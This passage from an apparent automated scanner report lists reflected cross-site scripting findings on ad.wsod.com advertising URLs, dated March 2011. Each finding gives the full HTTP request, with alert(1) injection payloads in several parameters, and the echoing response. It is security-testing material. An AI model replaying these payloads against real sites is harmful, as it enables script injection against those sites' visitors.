P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2715

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
17251,18961,22176,25344,30220,31691,33852,34172,40223,40773,42274,42703,43109,45351,45497,45604,45611,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,47805&Values=1589&Redirect=51663"><script>alert(1)</script>a907b67cc6ehttp://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/" target="_blank" border="0" style="border:0px;">
...[SNIP]...

1.89. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK [Redirect parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK

Issue detail

The value of the Redirect request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ad949"-alert(1)-"84f02805fb6 was submitted in the Redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351443&AdID=483239&TargetID=16169&Segments=1637,1641,2244,2743,3083,3285,7044,7182,8598,12257,17251,18961,22176,25344,30220,31691,33852,34172,40223,40773,42274,42703,43109,45351,45497,45604,45611,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,47805&Values=1589&Redirect=ad949"-alert(1)-"84f02805fb6 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=306x25_spon&cnn_money_rollup=homepage&cnn_money_section=last_five_quotes&params.styles=fs&tile=1300909177539&page.allowcompete=yes&domId=80976
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L|46:477:988:45:0:42331:1300828243:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 23 Mar 2011 19:42:12 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2685

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
17251,18961,22176,25344,30220,31691,33852,34172,40223,40773,42274,42703,43109,45351,45497,45604,45611,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,47805&Values=1589&Redirect=ad949"-alert(1)-"84f02805fb6">
...[SNIP]...

1.90. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK [Segments parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK

Issue detail

The value of the Segments request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5fab1"-alert(1)-"fd70bde4842 was submitted in the Segments parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351443&AdID=483239&TargetID=16169&Segments=1637,1641,2244,2743,3083,3285,7044,7182,8598,12257,17251,18961,22176,25344,30220,31691,33852,34172,40223,40773,42274,42703,43109,45351,45497,45604,45611,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,478055fab1"-alert(1)-"fd70bde4842&Values=1589&Redirect= HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=306x25_spon&cnn_money_rollup=homepage&cnn_money_section=last_five_quotes&params.styles=fs&tile=1300909177539&page.allowcompete=yes&domId=80976
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L|46:477:988:45:0:42331:1300828243:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 23 Mar 2011 19:41:46 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2685

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
,7044,7182,8598,12257,17251,18961,22176,25344,30220,31691,33852,34172,40223,40773,42274,42703,43109,45351,45497,45604,45611,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,478055fab1"-alert(1)-"fd70bde4842&Values=1589&Redirect=">
...[SNIP]...

1.91. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK [Segments parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK

Issue detail

The value of the Segments request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12a0d"><script>alert(1)</script>5e178e073c4 was submitted in the Segments parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351443&AdID=483239&TargetID=16169&Segments=1637,1641,2244,2743,3083,3285,7044,7182,8598,12257,17251,18961,22176,25344,30220,31691,33852,34172,40223,40773,42274,42703,43109,45351,45497,45604,45611,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,4780512a0d"><script>alert(1)</script>5e178e073c4&Values=1589&Redirect= HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=306x25_spon&cnn_money_rollup=homepage&cnn_money_section=last_five_quotes&params.styles=fs&tile=1300909177539&page.allowcompete=yes&domId=80976
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L|46:477:988:45:0:42331:1300828243:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 23 Mar 2011 19:41:45 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2715

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
,7044,7182,8598,12257,17251,18961,22176,25344,30220,31691,33852,34172,40223,40773,42274,42703,43109,45351,45497,45604,45611,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,4780512a0d"><script>alert(1)</script>5e178e073c4&Values=1589&Redirect=http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/" target="_blank" border="0" style="border:0px;">
...[SNIP]...

1.92. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK [TargetID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK

Issue detail

The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2998f"-alert(1)-"96971b52e93 was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351443&AdID=483239&TargetID=161692998f"-alert(1)-"96971b52e93&Segments=1637,1641,2244,2743,3083,3285,7044,7182,8598,12257,17251,18961,22176,25344,30220,31691,33852,34172,40223,40773,42274,42703,43109,45351,45497,45604,45611,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,47805&Values=1589&Redirect= HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=306x25_spon&cnn_money_rollup=homepage&cnn_money_section=last_five_quotes&params.styles=fs&tile=1300909177539&page.allowcompete=yes&domId=80976
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L|46:477:988:45:0:42331:1300828243:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 23 Mar 2011 19:41:38 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2685

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/1300909298**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351443&AdID=483239&TargetID=161692998f"-alert(1)-"96971b52e93&Segments=1637,1641,2244,2743,3083,3285,7044,7182,8598,12257,17251,18961,22176,25344,30220,31691,33852,34172,40223,40773,42274,42703,43109,45351,45497,45604,45611,46101,46163,46484,46485,46486,46694,46
...[SNIP]...

1.93. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK [TargetID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK

Issue detail

The value of the TargetID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c446"><script>alert(1)</script>38fa1f7afbe was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351443&AdID=483239&TargetID=161696c446"><script>alert(1)</script>38fa1f7afbe&Segments=1637,1641,2244,2743,3083,3285,7044,7182,8598,12257,17251,18961,22176,25344,30220,31691,33852,34172,40223,40773,42274,42703,43109,45351,45497,45604,45611,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,47805&Values=1589&Redirect= HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=306x25_spon&cnn_money_rollup=homepage&cnn_money_section=last_five_quotes&params.styles=fs&tile=1300909177539&page.allowcompete=yes&domId=80976
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L|46:477:988:45:0:42331:1300828243:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 23 Mar 2011 19:41:37 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2715

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
<a href="http://ads.cnn.com/event.ng/Type=click&FlightID=351443&AdID=483239&TargetID=161696c446"><script>alert(1)</script>38fa1f7afbe&Segments=1637,1641,2244,2743,3083,3285,7044,7182,8598,12257,17251,18961,22176,25344,30220,31691,33852,34172,40223,40773,42274,42703,43109,45351,45497,45604,45611,46101,46163,46484,46485,46486,46694,46
...[SNIP]...

1.94. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK [Values parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK

Issue detail

The value of the Values request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e008b"-alert(1)-"3b15cc48a14 was submitted in the Values parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351443&AdID=483239&TargetID=16169&Segments=1637,1641,2244,2743,3083,3285,7044,7182,8598,12257,17251,18961,22176,25344,30220,31691,33852,34172,40223,40773,42274,42703,43109,45351,45497,45604,45611,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,47805&Values=1589e008b"-alert(1)-"3b15cc48a14&Redirect= HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=306x25_spon&cnn_money_rollup=homepage&cnn_money_section=last_five_quotes&params.styles=fs&tile=1300909177539&page.allowcompete=yes&domId=80976
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L|46:477:988:45:0:42331:1300828243:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 23 Mar 2011 19:42:09 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2685

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
598,12257,17251,18961,22176,25344,30220,31691,33852,34172,40223,40773,42274,42703,43109,45351,45497,45604,45611,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,47805&Values=1589e008b"-alert(1)-"3b15cc48a14&Redirect=">
...[SNIP]...

1.95. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK [Values parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK

Issue detail

The value of the Values request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload afdd3"><script>alert(1)</script>184dd8f0960 was submitted in the Values parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351443&AdID=483239&TargetID=16169&Segments=1637,1641,2244,2743,3083,3285,7044,7182,8598,12257,17251,18961,22176,25344,30220,31691,33852,34172,40223,40773,42274,42703,43109,45351,45497,45604,45611,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,47805&Values=1589afdd3"><script>alert(1)</script>184dd8f0960&Redirect= HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=306x25_spon&cnn_money_rollup=homepage&cnn_money_section=last_five_quotes&params.styles=fs&tile=1300909177539&page.allowcompete=yes&domId=80976
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L|46:477:988:45:0:42331:1300828243:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 23 Mar 2011 19:42:08 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2715

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
598,12257,17251,18961,22176,25344,30220,31691,33852,34172,40223,40773,42274,42703,43109,45351,45497,45604,45611,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,47805&Values=1589afdd3"><script>alert(1)</script>184dd8f0960&Redirect=http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/" target="_blank" border="0" style="border:0px;">
...[SNIP]...

1.96. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK [click parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK

Issue detail

The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dd98f"-alert(1)-"77c5ebbd757 was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK?click=http://ads.cnn.com/event.ng/Type=clickdd98f"-alert(1)-"77c5ebbd757&FlightID=351443&AdID=483239&TargetID=16169&Segments=1637,1641,2244,2743,3083,3285,7044,7182,8598,12257,17251,18961,22176,25344,30220,31691,33852,34172,40223,40773,42274,42703,43109,45351,45497,45604,45611,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,47805&Values=1589&Redirect= HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=306x25_spon&cnn_money_rollup=homepage&cnn_money_section=last_five_quotes&params.styles=fs&tile=1300909177539&page.allowcompete=yes&domId=80976
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L|46:477:988:45:0:42331:1300828243:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 23 Mar 2011 19:41:25 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2685

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
pt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/1300909285**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://ads.cnn.com/event.ng/Type=clickdd98f"-alert(1)-"77c5ebbd757&FlightID=351443&AdID=483239&TargetID=16169&Segments=1637,1641,2244,2743,3083,3285,7044,7182,8598,12257,17251,18961,22176,25344,30220,31691,33852,34172,40223,40773,42274,42703,43109,45351,45497,45604,4
...[SNIP]...

1.97. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK [click parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK

Issue detail

The value of the click request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 11d26"><script>alert(1)</script>bb744f5e263 was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK?click=http://ads.cnn.com/event.ng/Type=click11d26"><script>alert(1)</script>bb744f5e263&FlightID=351443&AdID=483239&TargetID=16169&Segments=1637,1641,2244,2743,3083,3285,7044,7182,8598,12257,17251,18961,22176,25344,30220,31691,33852,34172,40223,40773,42274,42703,43109,45351,45497,45604,45611,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,47805&Values=1589&Redirect= HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=306x25_spon&cnn_money_rollup=homepage&cnn_money_section=last_five_quotes&params.styles=fs&tile=1300909177539&page.allowcompete=yes&domId=80976
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L|46:477:988:45:0:42331:1300828243:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 23 Mar 2011 19:41:25 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2715

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
<a href="http://ads.cnn.com/event.ng/Type=click11d26"><script>alert(1)</script>bb744f5e263&FlightID=351443&AdID=483239&TargetID=16169&Segments=1637,1641,2244,2743,3083,3285,7044,7182,8598,12257,17251,18961,22176,25344,30220,31691,33852,34172,40223,40773,42274,42703,43109,45351,45497,45604,4
...[SNIP]...

1.98. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59b8d"><script>alert(1)</script>94ff8a219f7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351443&AdID=483239&TargetID=16169&Segments=1637,1641,2244,2743,3083,3285,7044,7182,8598,12257,17251,18961,22176,25344,30220,31691,33852,34172,40223,40773,42274,42703,43109,45351,45497,45604,45611,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,47805&Values=1589&Redirect=&59b8d"><script>alert(1)</script>94ff8a219f7=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=306x25_spon&cnn_money_rollup=homepage&cnn_money_section=last_five_quotes&params.styles=fs&tile=1300909177539&page.allowcompete=yes&domId=80976
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L|46:477:988:45:0:42331:1300828243:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 23 Mar 2011 19:42:20 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2721

